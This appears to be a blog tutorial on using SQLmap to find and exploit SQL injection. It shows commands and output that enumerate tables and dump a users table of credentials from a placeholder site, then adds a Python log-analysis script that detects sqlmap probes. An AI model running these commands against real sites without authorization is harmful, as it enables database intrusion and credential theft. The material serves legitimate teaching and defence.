Web Application Penetration Testing (WAPT): SQLmap

Image generated by Microsoft Copilot

Hello everyone! Today I will share what I know about SQLmap, an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities in web applications. It is an essential addition to your toolbox. 😈💉

If you do not know anything about SQL injection attacks, please read this article before going ahead.

The tool described below is intended solely for educational purposes and ethical penetration testing. It should never be used for malicious activities or unauthorized access.

How to Use SQLmap

Setup

Before diving into the usage of SQLmap, you need to install it. To do that, you can simply clone the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

SQLMap Setup

It works with Python versions 2.6, 2.7 and 3.x on any platform (including Windows, Linux and macOS).

Ensure that everything works:

python3 sqlmap.py

Testing SQLmap

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.6.9#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help

Good Output

If your output differs, make sure that Python is installed and working properly by running python -V (remember that SQLmap works only with Python 2.6, 2.7 and 3.x), and check that you are in the correct directory (sqlmap-dev).

Usage

Once installed, you can start using SQLmap to test web applications for SQL injection vulnerabilities. Here’s a basic example:

python3 sqlmap.py -u "http://target-website.com/vulnerable-page.php?id=1"

Basic Usage

There are many options available; you can list all of them this way:

python3 sqlmap.py -hh

SQLmap Advanced Help Message

These are my favorite options:

  • -u URL, --url=URL: specifies the URL of the HTTP request (e.g., http://www.site.com/vuln.php?id=1);
  • --method=METHOD: forces the usage of an HTTP method (e.g., POST);
  • -r REQUESTFILE: loads the HTTP request from a file (alternative to -u);
  • --data=DATA: body of the HTTP request (e.g., "id=1");
  • --cookie=COOKIE: HTTP Cookie header value (e.g., "PHPSESSID=a8d127e..");
  • --headers=HEADERS: additional HTTP headers (e.g., "Accept-Language: fr\nETag: 123");
  • --proxy=PROXY: useful in case you need to intercept the requests sent by SQLmap (e.g., http://127.0.0.1:8080);
  • --dbms=DBMS: restricts the malicious payloads to a specific DBMS (e.g., MySQL);
  • --level=LEVEL: level of tests to perform (1-5, default 1); higher levels test more parameters (e.g., cookies and headers);
  • --risk=RISK: risk of tests to perform (1-3, default 1); risk 3 adds OR-based tests that can modify data if the injection lands in an UPDATE or DELETE statement, so be careful on production systems;
  • -a, --all: retrieves everything from the DBMS (i.e., all databases, all tables, all columns, etc.);
  • -b, --banner: retrieves the DBMS banner;
  • --current-user: retrieves the DBMS current user;
  • --current-db: retrieves the DBMS current database;
  • --dbs: enumerates all DBMS databases;
  • --tables: enumerates all DBMS database tables;
  • --columns: enumerates all DBMS database table columns;
  • -D DB: restricts enumeration to a specific DBMS database (e.g., -D database_name);
  • -T TBL: restricts enumeration to a specific DBMS database table (e.g., -T users);
  • -C COL: restricts enumeration to a specific DBMS database table column (e.g., -C password);

Example of Usage

First, you need an endpoint vulnerable to SQL injection. You can find one manually or with SQLmap itself. As an example, consider the following command:

python3 sqlmap.py -u "https://target-website.com/filter?id=1"

Finding a SQL Injection Entry Point

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.6.9#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:18:41 /2024-06-24/

[...]

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3764=3764 AND 'jMuR'='jMuR

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,(CHR(113)||CHR(107)||CHR(112)||CHR(122)||CHR(113))||(CHR(82)||CHR(98)||CHR(117)||CHR(78)||CHR(89)||CHR(79)||CHR(118)||CHR(118)||CHR(119)||CHR(121)||CHR(97)||CHR(114)||CHR(88)||CHR(85)||CHR(117)||CHR(81)||CHR(122)||CHR(69)||CHR(117)||CHR(69)||CHR(112)||CHR(90)||CHR(106)||CHR(99)||CHR(97)||CHR(119)||CHR(108)||CHR(122)||CHR(74)||CHR(82)||CHR(106)||CHR(122)||CHR(120)||CHR(85)||CHR(74)||CHR(78)||CHR(97)||CHR(105)||CHR(65)||CHR(67))||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))-- dudY
---
[11:21:13] [INFO] testing PostgreSQL
[11:21:14] [INFO] confirming PostgreSQL
[11:21:14] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL

[...]

[*] ending @ 11:21:32 /2024-06-24/

SQL Injection Entry Point Found

As shown above, SQLmap was able to identify a SQL injection entry point (i.e., the "id" parameter) and the backend DBMS (i.e., PostgreSQL). This is enough to generate a proof of concept. However, to accurately assess this vulnerability, we need to proceed further. Our next step is to attempt to extract the list of tables available in the current database:

python3 sqlmap.py --tables -u "https://target-website.com/filter?id=1"

Tables Enumeration

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.6.9#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:23:18 /2024-06-24/

[...]

[11:23:39] [INFO] fetching tables for database: 'db'
Database: db
[4 tables]
+--------------+
| users        |
| products     |
| reviews      |
| coupon_codes |
+--------------+


[...]

[*] ending @ 11:23:39 /2024-06-24/

List of Tables

The users table is usually the most interesting one, so we can try to dump it in the following way:

python3 sqlmap.py --dump -T users -u "https://vulnerable-website.com/filter?id=1"

Dumping the "Users" Table

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.6.9#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:15:57 /2024-06-24/

[...]

[13:25:13] [INFO] fetching entries for table 'users' in database 'db'
Database: db
Table: users
[3 entries]
+------------------+-------------------+
| username         |  password         |
+------------------+-------------------+
| admin            |  4XAaQS0P5a3HASo  |
| bob              |  dtgYu09lf8nimG1  |
| alice            |  SKeMA5vceEmZxWl  |
+------------------+-------------------+


[...]

[*] ending @ 13:25:13 /2024-06-24/

"Users" Table

Great job! We now have the admin credentials, giving us access to privileged functions. 😄
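To see the same run from the defender's side, here is an added example (not from the article or the sqlmap project): a small Python script that scans web-server access-log lines for the traces the probes above leave behind, namely sqlmap's default User-Agent (sent unless --random-agent or --user-agent is used), the AND n=n and 'x'='x tautologies of the boolean-based blind test, the UNION ... NULL column probe, and the CHR() concatenation chains, which it decodes so the analyst can read the random marker string sqlmap wraps its extracted data in. The log lines are constructed in the combined log format and the indicator regexes are my own assumptions, not sqlmap's signatures.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (not from the article). The query strings
# mirror the payload shapes sqlmap reported above: the boolean-based blind test
# and a UNION test whose marker string is built from a CHR() concatenation.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jun/2024:11:18:41 +0000] "GET /filter?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Jun/2024:11:18:42 +0000] "GET /filter?id=1%27%20AND%203764%3D3764%20AND%20%27jMuR%27%3D%27jMuR HTTP/1.1" 200 512 "-" "sqlmap/1.8.6.9#dev (https://sqlmap.org)"
10.0.0.5 - - [24/Jun/2024:11:21:10 +0000] "GET /filter?id=1%27%20UNION%20ALL%20SELECT%20NULL%2C%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29--%20dudY HTTP/1.1" 200 900 "-" "sqlmap/1.8.6.9#dev (https://sqlmap.org)"
"""

# Combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"$')

# Indicators checked against each URL-decoded parameter value (assumed patterns).
QUERY_INDICATORS = [
    ("boolean tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("string tautology", re.compile(r"'(\w+)'\s*=\s*'\1(?!\w)")),
    ("UNION NULL probe", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\s+NULL\b", re.I)),
]
CHR_CHAIN = re.compile(r"(?:CHR\(\d+\)\|\|)+CHR\(\d+\)", re.I)

def decode_chr_chain(expr: str) -> str:
    """Rebuild the text that a CHR(n)||CHR(n)||... concatenation produces."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", expr, re.I))

def analyze(log_text: str):
    """Return (findings, probes): suspicious requests and a per-client hit count."""
    findings = []
    probes = Counter()  # (client ip, path) -> number of suspicious requests
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target, user_agent = m.group(1), m.group(3), m.group(4)
        url = urlparse(target)
        reasons = []
        if "sqlmap" in user_agent.lower():  # default UA unless --random-agent/--user-agent is set
            reasons.append("sqlmap user-agent")
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:  # parse_qs already URL-decodes the value
                reasons += [f"{label} in {name}" for label, p in QUERY_INDICATORS if p.search(value)]
                for chain in CHR_CHAIN.findall(value):
                    reasons.append(f"CHR chain in {name} decodes to {decode_chr_chain(chain)!r}")
        if reasons:
            findings.append({"ip": ip, "path": url.path, "reasons": reasons})
            probes[(ip, url.path)] += 1
    return findings, probes
```

Run against the sample, the first request is clean while the other two are flagged, and the decoded chain reveals the five-letter marker (qkpzq) that sqlmap placed around its test value in the UNION payload shown above.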


Some interesting resources:


I hope you found this guide on SQLmap informative and helpful. Whether you're a beginner or an experienced professional, your insights and experiences are valuable to us and the community. Have you already used SQLmap in your security assessments? What challenges have you faced, and what tips can you share? 🤝